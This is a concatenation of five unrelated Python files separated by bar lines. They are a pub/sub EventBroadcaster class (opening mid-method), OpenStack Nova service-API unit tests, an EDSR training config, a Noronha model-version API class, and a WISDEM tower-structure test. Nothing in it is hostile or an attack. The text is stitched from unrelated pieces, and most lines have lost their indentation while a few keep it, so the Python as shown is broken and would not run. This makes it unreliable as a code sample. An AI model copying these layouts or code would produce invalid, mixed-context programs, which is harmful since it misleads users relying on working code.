if self._share:
self._event_broadcaster._share_count -= 1
# if this was last sharer - we can stop subscribing to internal events - we aren't sharing anymore
if self._event_broadcaster._share_count == 0:
# Unsubscribe from internal events
logger.debug("Unsubscribing from ALL TOPICS")
await self._event_broadcaster._unsubscribe_from_topics()
            except Exception:
                logger.exception("Failed to exit EventBroadcaster context")
class EventBroadcaster:
"""
Bridge EventNotifier to work across processes and machines by sharing their events through a broadcasting channel
Usage:
uri = "postgres://localhost:5432/db_name" #postgres example (also supports REDIS, Kafka, ...)
# start litsening for broadcast publications notifying the internal event-notifier, and subscribing to the internal notifier, broadcasting its notes
broadcaster = EventBroadcaster(uri, notifier):
async with broadcaster.get_context():
<Your Code>
"""
def __init__(self, broadcast_url: str, notifier: EventNotifier, channel="EventNotifier",
broadcast_type=None, is_publish_only=False) -> None:
"""
Args:
broadcast_url (str): the URL of the broadcasting service
notifier (EventNotifier): the event notifier managing our internal events - which will be bridge via the broadcaster
channel (str, optional): Channel name. Defaults to "EventNotifier".
broadcast_type (Broadcast, optional): Broadcast class to use. None - Defaults to Broadcast.
is_publish_only (bool, optional): [For default context] Should the broadcaster only transmit events and not listen to any. Defaults to False
"""
# Broadcast init params
self._broadcast_url = broadcast_url
self._broadcast_type = broadcast_type or Broadcast
# Publish broadcast (initialized within async with statement)
self._sharing_broadcast_channel = None
# channel to operate on
self._channel = channel
# Async-io task for reading broadcasts (initialized within async with statement)
self._subscription_task = None
        # Unique instance id (used to avoid reading our own notifications sent over the broadcast)
self._id = gen_uid()
# The internal events notifier
self._notifier = notifier
self._is_publish_only = is_publish_only
self._publish_lock = None
# used to track creation / removal of resources needed per type (reader task->listen, and subscription to internal events->share)
self._listen_count: int = 0
self._share_count: int = 0
# If we opt to manage the context directly (i.e. call async with on the event broadcaster itself)
self._context_manager = None
async def __broadcast_notifications__(self, subscription: Subscription, data):
"""
Share incoming internal notifications with the entire broadcast channel
Args:
subscription (Subscription): the subscription that got triggered
data: the event data
"""
logger.info("Broadcasting incoming event: {}".format({'topic': subscription.topic, 'notifier_id': self._id}))
note = BroadcastNotification(notifier_id=self._id, topics=[
subscription.topic], data=data)
# Publish event to broadcast
async with self._publish_lock:
async with self._sharing_broadcast_channel:
await self._sharing_broadcast_channel.publish(self._channel, note.json())
def _acquire_sharing_broadcast_channel(self):
"""
Initialize the elements needed for sharing events with the broadcast channel
"""
self._publish_lock = asyncio.Lock()
self._sharing_broadcast_channel = self._broadcast_type(self._broadcast_url)
async def _subscribe_to_all_topics(self):
return await self._notifier.subscribe(self._id,
ALL_TOPICS,
self.__broadcast_notifications__)
async def _unsubscribe_from_topics(self):
return await self._notifier.unsubscribe(self._id)
def get_context(self, listen=True, share=True):
"""
Create a new context manager you can call 'async with' on, configuring the broadcaster for listening, sharing, or both.
Args:
listen (bool, optional): Should we listen for events incoming from the broadcast channel. Defaults to True.
share (bool, optional): Should we share events with the broadcast channel. Defaults to True.
Returns:
EventBroadcasterContextManager: the context
"""
return EventBroadcasterContextManager(self, listen=listen, share=share)
def get_listening_context(self):
return EventBroadcasterContextManager(self, listen=True, share=False)
def get_sharing_context(self):
return EventBroadcasterContextManager(self, listen=False, share=True)
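    # Usage sketch (assumes a reachable broadcast backend at the given URI):
    #   notifier = EventNotifier()
    #   broadcaster = EventBroadcaster("redis://localhost:6379", notifier)
    #   async with broadcaster.get_listening_context():
    #       ...  # receive remote events without re-publishing our own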
async def __aenter__(self):
"""
        Convenience for the caller (also backward compatibility)
"""
if self._context_manager is None:
self._context_manager = self.get_context(listen=not self._is_publish_only)
return await self._context_manager.__aenter__()
async def __aexit__(self, exc_type, exc, tb):
await self._context_manager.__aexit__(exc_type, exc, tb)
def start_reader_task(self):
"""Spawn a task reading incoming broadcasts and posting them to the intreal notifier
Raises:
BroadcasterAlreadyStarted: if called more than once per context
Returns:
the spawned task
"""
# Make sure a task wasn't started already
if self._subscription_task is not None:
# we already started a task for this worker process
logger.debug("No need for listen task, already started broadcast listen task for this notifier")
return
# Trigger the task
logger.debug("Spawning broadcast listen task")
self._subscription_task = asyncio.create_task(
self.__read_notifications__())
return self._subscription_task
async def __read_notifications__(self):
"""
        Read incoming broadcasts and post them to the internal notifier
"""
logger.info("Starting broadcaster listener")
# Init new broadcast channel for reading
listening_broadcast_channel = self._broadcast_type(self._broadcast_url)
async with listening_broadcast_channel:
# Subscribe to our channel
async with listening_broadcast_channel.subscribe(channel=self._channel) as subscriber:
async for event in subscriber:
try:
notification = BroadcastNotification.parse_raw(
event.message)
# Avoid re-publishing our own broadcasts
if notification.notifier_id != self._id:
logger.info("Handling incoming broadcast event: {}".format({'topics': notification.topics, 'src': notification.notifier_id}))
# Notify subscribers of message received from broadcast
await self._notifier.notify(notification.topics, notification.data, notifier_id=self._id)
                    except Exception:
logger.exception("Failed handling incoming broadcast")
|
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import calendar
import datetime
import webob.exc
from nova.api.openstack.compute.contrib import services
from nova.api.openstack import extensions
from nova import availability_zones
from nova import context
from nova import db
from nova import exception
from nova.openstack.common import timeutils
from nova.servicegroup.drivers import db as db_driver
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests.objects import test_service
fake_services_list = [
dict(test_service.fake_service,
binary='nova-scheduler',
host='host1',
id=1,
disabled=True,
topic='scheduler',
updated_at=datetime.datetime(2012, 10, 29, 13, 42, 2),
created_at=datetime.datetime(2012, 9, 18, 2, 46, 27),
disabled_reason='test1'),
dict(test_service.fake_service,
binary='nova-compute',
host='host1',
id=2,
disabled=True,
topic='compute',
updated_at=datetime.datetime(2012, 10, 29, 13, 42, 5),
created_at=datetime.datetime(2012, 9, 18, 2, 46, 27),
disabled_reason='test2'),
dict(test_service.fake_service,
binary='nova-scheduler',
host='host2',
id=3,
disabled=False,
topic='scheduler',
updated_at=datetime.datetime(2012, 9, 19, 6, 55, 34),
created_at=datetime.datetime(2012, 9, 18, 2, 46, 28),
disabled_reason=''),
dict(test_service.fake_service,
binary='nova-compute',
host='host2',
id=4,
disabled=True,
topic='compute',
updated_at=datetime.datetime(2012, 9, 18, 8, 3, 38),
created_at=datetime.datetime(2012, 9, 18, 2, 46, 28),
disabled_reason='test4'),
]
class FakeRequest(object):
environ = {"nova.context": context.get_admin_context()}
GET = {}
class FakeRequestWithService(object):
environ = {"nova.context": context.get_admin_context()}
GET = {"binary": "nova-compute"}
class FakeRequestWithHost(object):
environ = {"nova.context": context.get_admin_context()}
GET = {"host": "host1"}
class FakeRequestWithHostService(object):
environ = {"nova.context": context.get_admin_context()}
GET = {"host": "host1", "binary": "nova-compute"}
def fake_host_api_service_get_all(context, filters=None, set_zones=False):
if set_zones or 'availability_zone' in filters:
return availability_zones.set_availability_zones(context,
fake_services_list)
def fake_db_api_service_get_all(context, disabled=None):
return fake_services_list
def fake_service_get_by_host_binary(context, host, binary):
for service in fake_services_list:
if service['host'] == host and service['binary'] == binary:
return service
return None
def fake_service_get_by_id(value):
for service in fake_services_list:
if service['id'] == value:
return service
return None
def fake_service_update(context, service_id, values):
service = fake_service_get_by_id(service_id)
if service is None:
raise exception.ServiceNotFound(service_id=service_id)
return service
def fake_utcnow():
return datetime.datetime(2012, 10, 29, 13, 42, 11)
def fake_utcnow_ts():
d = fake_utcnow()
return calendar.timegm(d.utctimetuple())
class ServicesTest(test.TestCase):
def setUp(self):
super(ServicesTest, self).setUp()
self.context = context.get_admin_context()
self.ext_mgr = extensions.ExtensionManager()
self.ext_mgr.extensions = {}
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
self.stubs.Set(timeutils, "utcnow", fake_utcnow)
self.stubs.Set(timeutils, "utcnow_ts", fake_utcnow_ts)
self.stubs.Set(db, "service_get_by_args",
fake_service_get_by_host_binary)
self.stubs.Set(db, "service_update", fake_service_update)
def test_services_list(self):
req = FakeRequest()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-scheduler',
'host': 'host1',
'zone': 'internal',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2)},
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5)},
{'binary': 'nova-scheduler',
'host': 'host2',
'zone': 'internal',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 19, 6, 55, 34)},
{'binary': 'nova-compute',
'host': 'host2',
'zone': 'nova',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38)}]}
self.assertEqual(res_dict, response)
def test_services_list_with_host(self):
req = FakeRequestWithHost()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-scheduler',
'host': 'host1',
'zone': 'internal',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2)},
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5)}]}
self.assertEqual(res_dict, response)
def test_services_list_with_service(self):
req = FakeRequestWithService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5)},
{'binary': 'nova-compute',
'host': 'host2',
'zone': 'nova',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38)}]}
self.assertEqual(res_dict, response)
def test_services_list_with_host_service(self):
req = FakeRequestWithHostService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5)}]}
self.assertEqual(res_dict, response)
def test_services_detail(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
req = FakeRequest()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-scheduler',
'host': 'host1',
'zone': 'internal',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'disabled_reason': 'test1'},
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'nova-scheduler',
'host': 'host2',
'zone': 'internal',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 19, 6, 55, 34),
'disabled_reason': ''},
{'binary': 'nova-compute',
'host': 'host2',
'zone': 'nova',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'disabled_reason': 'test4'}]}
self.assertEqual(res_dict, response)
def test_service_detail_with_host(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
req = FakeRequestWithHost()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-scheduler',
'host': 'host1',
'zone': 'internal',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'disabled_reason': 'test1'},
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'}]}
self.assertEqual(res_dict, response)
def test_service_detail_with_service(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
req = FakeRequestWithService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'nova-compute',
'host': 'host2',
'zone': 'nova',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'disabled_reason': 'test4'}]}
self.assertEqual(res_dict, response)
def test_service_detail_with_host_service(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
req = FakeRequestWithHostService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'}]}
self.assertEqual(res_dict, response)
def test_services_enable(self):
def _service_update(context, service_id, values):
self.assertIsNone(values['disabled_reason'])
return dict(test_service.fake_service, **values)
self.stubs.Set(db, "service_update", _service_update)
body = {'host': 'host1', 'binary': 'nova-compute'}
req = fakes.HTTPRequest.blank('/v2/fake/os-services/enable')
res_dict = self.controller.update(req, "enable", body)
self.assertEqual(res_dict['service']['status'], 'enabled')
self.assertNotIn('disabled_reason', res_dict['service'])
# This test is just to verify that the servicegroup API gets used when
# calling this API.
def test_services_with_exception(self):
def dummy_is_up(self, dummy):
raise KeyError()
self.stubs.Set(db_driver.DbDriver, 'is_up', dummy_is_up)
req = FakeRequestWithHostService()
self.assertRaises(KeyError, self.controller.index, req)
def test_services_disable(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-services/disable')
body = {'host': 'host1', 'binary': 'nova-compute'}
res_dict = self.controller.update(req, "disable", body)
self.assertEqual(res_dict['service']['status'], 'disabled')
self.assertNotIn('disabled_reason', res_dict['service'])
def test_services_disable_log_reason(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = \
fakes.HTTPRequest.blank('v2/fakes/os-services/disable-log-reason')
body = {'host': 'host1',
'binary': 'nova-compute',
'disabled_reason': 'test-reason',
}
res_dict = self.controller.update(req, "disable-log-reason", body)
self.assertEqual(res_dict['service']['status'], 'disabled')
self.assertEqual(res_dict['service']['disabled_reason'], 'test-reason')
def test_mandatory_reason_field(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = \
fakes.HTTPRequest.blank('v2/fakes/os-services/disable-log-reason')
body = {'host': 'host1',
'binary': 'nova-compute',
}
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.update, req, "disable-log-reason", body)
def test_invalid_reason_field(self):
reason = ' '
self.assertFalse(self.controller._is_valid_as_reason(reason))
reason = 'a' * 256
self.assertFalse(self.controller._is_valid_as_reason(reason))
reason = 'it\'s a valid reason.'
self.assertTrue(self.controller._is_valid_as_reason(reason))
|
import argparse
import template
import os.path
import easydict
### See option.py for detailed information.
args = easydict.EasyDict({
'debug': False,
'template': '.',
'degradation': False,
# Hardware specifications
'n_threads': 0,
'cpu': False,
'n_GPUs': 1,
'seed': 1,
# Data specifications
'dir_data': '~/Datasets/',
'dir_demo': '../test',
'data_train': 'DIV2K',
'data_test': 'DIV2K',
'data_range': '1-800/801-810',
'ext': 'sep',
'scale': '4',
'patch_size': 192,
'rgb_range': 255,
'n_colors': 3,
'chop': False,
'ch_shuffle': False,
'lr_noise_sigma': 0.0,
'no_augment': False,
# Model specifications
'model' : 'EDSR',
'normalization': 'None',
'act': 'relu',
'pre_train': '',
'extend': '',
'n_depth': 2,
'n_resgroups': 4,
'n_resblocks': 16,
'n_feats': 64,
'res_scale': 1.0,
'shift_mean': True,
'dilation': False,
'precision': 'single',
    # Training Specifications
'reset': False,
'test_every': 1000,
'epochs': 300,
'batch_size': 16,
'split_batch': 1,
'self_ensemble': False,
'test_only': False,
'gan_k': 1,
'gan_arch': 'patch',
# Optimization specifications
'lr': 1e-4,
'decay': '200',
'gamma': 0.5,
'optimizer': 'ADAM',
'momentum': 0.9,
'betas': (0.9, 0.999),
'epsilon': 1e-8,
'weight_decay': 0,
'gclip': 0,
# Loss specifications
'loss': '1*L1',
'skip_threshold': 1e8,
# Log specifications
'save': 'test',
'load': '',
'resume': 0,
'save_models': False,
'print_every': 100,
'save_results': False,
'save_gt': False
})
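# EasyDict exposes keys as attributes, e.g. args.batch_size == args['batch_size'] == 16.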
|
# -*- coding: utf-8 -*-
# Copyright Noronha Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from noronha.api.main import NoronhaAPI
from noronha.bay.barrel import MoversBarrel
from noronha.common.annotations import validate
from noronha.common.errors import NhaAPIError
from noronha.common.logging import LOG
from noronha.db.ds import Dataset
from noronha.db.model import Model
from noronha.db.movers import ModelVersion
from noronha.db.train import Training
class ModelVersionAPI(NoronhaAPI):
doc = ModelVersion
valid = NoronhaAPI.valid
def info(self, name, model):
return super().info(name=name, model=model)
def rm(self, name, model):
mv = self.doc().find_one(name=name, model=model)
# TODO: check if movers is not being used in a depl right now
mv.delete()
return dict(
name=name,
model=model,
record='removed',
files='purged' if MoversBarrel(mv).purge(ignore=True) else 'not_found'
)
def lyst(self, _filter: dict = None, model: str = None, train: str = None, ds: str = None, **kwargs):
if model is not None:
kwargs['model'] = Model().find_one(name=model).name
_filter = _filter or {}
if train is not None:
if self.proj is None:
raise NhaAPIError("Cannot filter by training name if no working project is set")
else:
train = Training.find_one(name=train, proj=self.proj.name)
_filter['train.name'] = train.name
_filter['train.bvers.proj.name'] = train.bvers.proj.name
if ds is not None:
if model is None:
raise NhaAPIError("Cannot filter by dataset name if no model was specified")
else:
ds = Dataset.find_one(name=ds, model=model)
_filter['ds.name'] = ds.name
_filter['ds.model'] = ds.model.name
return super().lyst(_filter=_filter, **kwargs)
def _store(self, mv: ModelVersion, path: str = None):
barrel = MoversBarrel(mv)
if barrel.schema is None:
LOG.warn("Publishing model version '{}' without a strict file definition".format(mv.get_pk()))
barrel.store_from_path(path)
return barrel
@validate(name=valid.dns_safe_or_none, details=(dict, None))
def new(self, name: str = None, model: str = None, train: str = None, ds: str = None, path: str = None,
pretrained: str = None, skip_upload=False, lightweight=False, **kwargs):
if path is None:
raise NhaAPIError("Cannot publish model version if path to model files is not provided")
model = Model.find_one(name=model)
if lightweight:
model.assert_movers_can_be_lightweight()
if ds is not None:
kwargs['ds'] = Dataset.find_one(name=ds, model=model).to_embedded()
if train is not None:
if self.proj is None:
raise NhaAPIError("Cannot determine parent training if no working project is set")
else:
kwargs['train'] = Training.find_one(name=train, proj=self.proj.name).to_embedded()
if pretrained is not None:
kwargs['pretrained'] = ModelVersion.find_by_pk(pretrained).to_embedded()
LOG.info("Model version used pre-trained model '{}'".format(pretrained))
mv: ModelVersion = super().new(
name=name,
model=model,
lightweight=lightweight,
**kwargs,
_duplicate_filter=dict(name=name, model=model)
)
barrel = None
try:
if not skip_upload:
barrel = self._store(mv, path)
except Exception as e:
LOG.warn("Reverting creation of model version '{}'".format(mv.name))
mv.delete()
if barrel is not None:
barrel.purge(ignore=True)
raise e
return mv
@validate(details=(dict, None))
def update(self, name, model, train: str = None, ds: str = None, path: str = None, **kwargs):
if ds is not None:
kwargs['ds'] = Dataset().find_one(name=ds, model=model).to_embedded()
if train is not None:
if self.proj is None:
raise NhaAPIError("Cannot determine parent training if no working project is set")
else:
kwargs['train'] = Training().find_one(name=train, proj=self.proj.name).to_embedded()
mv = super().update(
filter_kwargs=dict(name=name, model=model),
update_kwargs=kwargs
)
if path is not None:
self._store(mv, path)
return mv
|
import unittest
import numpy as np
import numpy.testing as npt
import wisdem.towerse.tower_struct as tow
from wisdem.towerse import RIGID
class TestStruct(unittest.TestCase):
def setUp(self):
self.inputs = {}
self.outputs = {}
self.discrete_inputs = {}
self.discrete_outputs = {}
# Store analysis options
self.modeling_options = {}
self.modeling_options["materials"] = {}
self.modeling_options["materials"]["n_mat"] = 1
self.modeling_options["flags"] = {}
self.modeling_options["flags"]["monopile"] = False
self.modeling_options["WISDEM"] = {}
self.modeling_options["WISDEM"]["TowerSE"] = {}
self.modeling_options["WISDEM"]["TowerSE"]["buckling_method"] = "eurocode"
self.modeling_options["WISDEM"]["TowerSE"]["buckling_length"] = 30.0
self.modeling_options["WISDEM"]["TowerSE"]["n_height_tower"] = 3
self.modeling_options["WISDEM"]["TowerSE"]["n_layers_tower"] = 1
self.modeling_options["WISDEM"]["TowerSE"]["n_height_monopile"] = 0
self.modeling_options["WISDEM"]["TowerSE"]["n_layers_monopile"] = 0
self.modeling_options["WISDEM"]["TowerSE"]["n_height"] = 3
self.modeling_options["WISDEM"]["TowerSE"]["n_refine"] = 3
self.modeling_options["WISDEM"]["TowerSE"]["wind"] = "PowerWind"
self.modeling_options["WISDEM"]["TowerSE"]["nLC"] = 1
self.modeling_options["WISDEM"]["TowerSE"]["soil_springs"] = False
self.modeling_options["WISDEM"]["TowerSE"]["gravity_foundation"] = False
self.modeling_options["WISDEM"]["TowerSE"]["gamma_f"] = 1.0
self.modeling_options["WISDEM"]["TowerSE"]["gamma_m"] = 1.0
self.modeling_options["WISDEM"]["TowerSE"]["gamma_n"] = 1.0
self.modeling_options["WISDEM"]["TowerSE"]["gamma_b"] = 1.0
self.modeling_options["WISDEM"]["TowerSE"]["gamma_fatigue"] = 1.0
# Simplified the options available to the user
self.modeling_options["WISDEM"]["TowerSE"]["frame3dd"] = {}
# self.modeling_options['TowerSE']['frame3dd']['DC'] = 80.0
self.modeling_options["WISDEM"]["TowerSE"]["frame3dd"]["shear"] = True
self.modeling_options["WISDEM"]["TowerSE"]["frame3dd"]["geom"] = True
# self.modeling_options['TowerSE']['frame3dd']['dx'] = -1
# self.modeling_options['TowerSE']['frame3dd']['nM'] = 6
# self.modeling_options['TowerSE']['frame3dd']['Mmethod'] = 1
# self.modeling_options['TowerSE']['frame3dd']['lump'] = 0
self.modeling_options["WISDEM"]["TowerSE"]["frame3dd"]["tol"] = 1e-9
# self.modeling_options['TowerSE']['frame3dd']['shift'] = 0.0
# self.modeling_options['TowerSE']['frame3dd']['add_gravity'] = True
def testPreFrame(self):
# Test Land
self.inputs["z_param"] = 10.0 * np.array([0.0, 3.0, 6.0])
self.inputs["z_full"] = 10.0 * np.arange(0, 7)
self.inputs["d_full"] = 6.0 * np.ones(self.inputs["z_full"].shape)
self.inputs["mass"] = 1e5
self.inputs["mI"] = np.r_[1e5, 1e5, 2e5, np.zeros(3)]
self.inputs["mrho"] = np.array([-3.0, 0.0, 1.0])
self.inputs["transition_piece_mass"] = 0.0
self.inputs["transition_piece_cost"] = 0.0
self.inputs["transition_piece_height"] = 0.0
self.inputs["transition_piece_I"] = np.zeros(6)
self.inputs["gravity_foundation_I"] = np.zeros(6)
self.inputs["gravity_foundation_mass"] = 0.0
self.inputs["suctionpile_depth"] = 0.0
self.inputs["rna_F"] = 1e5 * np.arange(2,5)
self.inputs["rna_M"] = 1e6 * np.arange(2,5)
self.inputs["E"] = 1e9 * np.ones(2)
self.inputs["G"] = 1e8 * np.ones(2)
self.inputs["sigma_y"] = 1e8 * np.ones(2)
myobj = tow.TowerPreFrame(n_height=3, n_refine=3, monopile=False)
myobj.compute(self.inputs, self.outputs)
npt.assert_equal(self.outputs["kidx"], np.array([0]))
npt.assert_equal(self.outputs["kx"], np.array([RIGID]))
npt.assert_equal(self.outputs["ky"], np.array([RIGID]))
npt.assert_equal(self.outputs["kz"], np.array([RIGID]))
npt.assert_equal(self.outputs["ktx"], np.array([RIGID]))
npt.assert_equal(self.outputs["kty"], np.array([RIGID]))
npt.assert_equal(self.outputs["ktz"], np.array([RIGID]))
npt.assert_equal(self.outputs["midx"], np.zeros(2))
npt.assert_equal(self.outputs["m"], np.zeros(2))
npt.assert_equal(self.outputs["mrhox"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoy"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxx"], np.zeros(2))
npt.assert_equal(self.outputs["mIyy"], np.zeros(2))
npt.assert_equal(self.outputs["mIzz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxy"], np.zeros(2))
npt.assert_equal(self.outputs["mIxz"], np.zeros(2))
npt.assert_equal(self.outputs["mIyz"], np.zeros(2))
npt.assert_equal(self.outputs["plidx"], np.array([6]))
npt.assert_equal(self.outputs["Fx"], np.array([2e5]))
npt.assert_equal(self.outputs["Fy"], np.array([3e5]))
npt.assert_equal(self.outputs["Fz"], np.array([4e5]))
npt.assert_equal(self.outputs["Mxx"], np.array([2e6]))
npt.assert_equal(self.outputs["Myy"], np.array([3e6]))
npt.assert_equal(self.outputs["Mzz"], np.array([4e6]))
# Test Monopile no springs, no GBF
self.inputs["z_full"] = 10.0 * np.arange(-6, 7)
self.inputs["d_full"] = 6.0 * np.ones(self.inputs["z_full"].shape)
self.inputs["transition_piece_mass"] = 1e3
self.inputs["transition_piece_cost"] = 1e4
self.inputs["transition_piece_I"] = 1e3 * 9 * np.r_[0.5, 0.5, 1.0, np.zeros(3)]
self.inputs["transition_piece_height"] = 10.0
self.inputs["gravity_foundation_mass"] = 0.0 # 1e4
self.inputs["suctionpile_depth"] = 30.0
self.inputs["rna_F"] = 1e5 * np.arange(2,5)
self.inputs["rna_M"] = 1e6 * np.arange(2,5)
self.inputs["k_soil"] = (20.0 + np.arange(6))[np.newaxis, :] * np.ones((2, 6))
self.inputs["z_soil"] = np.r_[-30.0, 0.0]
myobj = tow.TowerPreFrame(n_height=5, n_refine=3, monopile=True, soil_springs=False)
myobj.compute(self.inputs, self.outputs)
npt.assert_equal(self.outputs["kidx"], np.arange(4))
npt.assert_equal(self.outputs["kx"], RIGID)
npt.assert_equal(self.outputs["ky"], RIGID)
npt.assert_equal(self.outputs["kz"], RIGID)
npt.assert_equal(self.outputs["ktx"], RIGID)
npt.assert_equal(self.outputs["kty"], RIGID)
npt.assert_equal(self.outputs["ktz"], RIGID)
npt.assert_equal(self.outputs["midx"], np.array([7, 0]))
npt.assert_equal(self.outputs["m"], np.array([1e3, 0.0]))
npt.assert_equal(self.outputs["mrhox"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoy"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxx"], np.array([1e3 * 9 * 0.5, 0]))
npt.assert_equal(self.outputs["mIyy"], np.array([1e3 * 9 * 0.5, 0]))
npt.assert_equal(self.outputs["mIzz"], np.array([1e3 * 9, 0]))
npt.assert_equal(self.outputs["mIxy"], np.zeros(2))
npt.assert_equal(self.outputs["mIxz"], np.zeros(2))
npt.assert_equal(self.outputs["mIyz"], np.zeros(2))
npt.assert_equal(self.outputs["plidx"], np.array([12]))
npt.assert_equal(self.outputs["Fx"], np.array([2e5]))
npt.assert_equal(self.outputs["Fy"], np.array([3e5]))
npt.assert_equal(self.outputs["Fz"], np.array([4e5]))
npt.assert_equal(self.outputs["Mxx"], np.array([2e6]))
npt.assert_equal(self.outputs["Myy"], np.array([3e6]))
npt.assert_equal(self.outputs["Mzz"], np.array([4e6]))
# Test Monopile springs, no GBF
self.inputs["z_full"] = 10.0 * np.arange(-6, 7)
self.inputs["d_full"] = 6.0 * np.ones(self.inputs["z_full"].shape)
self.inputs["transition_piece_mass"] = 1e3
self.inputs["transition_piece_cost"] = 1e4
self.inputs["transition_piece_I"] = 1e3 * 9 * np.r_[0.5, 0.5, 1.0, np.zeros(3)]
self.inputs["transition_piece_height"] = 10.0
self.inputs["gravity_foundation_mass"] = 0.0 # 1e4
self.inputs["suctionpile_depth"] = 30.0
self.inputs["rna_F"] = 1e5 * np.arange(2,5)
self.inputs["rna_M"] = 1e6 * np.arange(2,5)
self.inputs["k_soil"] = (20.0 + np.arange(6))[np.newaxis, :] * np.ones((2, 6))
self.inputs["z_soil"] = np.r_[-30.0, 0.0]
myobj = tow.TowerPreFrame(n_height=5, n_refine=3, monopile=True, soil_springs=True)
myobj.compute(self.inputs, self.outputs)
npt.assert_equal(self.outputs["kidx"], np.arange(4))
npt.assert_equal(self.outputs["kx"], 20.0)
npt.assert_equal(self.outputs["ky"], 22.0)
npt.assert_equal(self.outputs["kz"], np.r_[24.0, np.zeros(3)])
npt.assert_equal(self.outputs["ktx"], 21.0)
npt.assert_equal(self.outputs["kty"], 23.0)
npt.assert_equal(self.outputs["ktz"], 25.0)
npt.assert_equal(self.outputs["midx"], np.array([7, 0]))
npt.assert_equal(self.outputs["m"], np.array([1e3, 0.0]))
npt.assert_equal(self.outputs["mrhox"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoy"], np.zeros(2))
npt.assert_equal(self.outputs["mrhoz"], np.zeros(2))
npt.assert_equal(self.outputs["mIxx"], np.array([1e3 * 9 * 0.5, 0]))
npt.assert_equal(self.outputs["mIyy"], np.array([1e3 * 9 * 0.5, 0]))
npt.assert_equal(self.outputs["mIzz"], np.array([1e3 * 9, 0]))
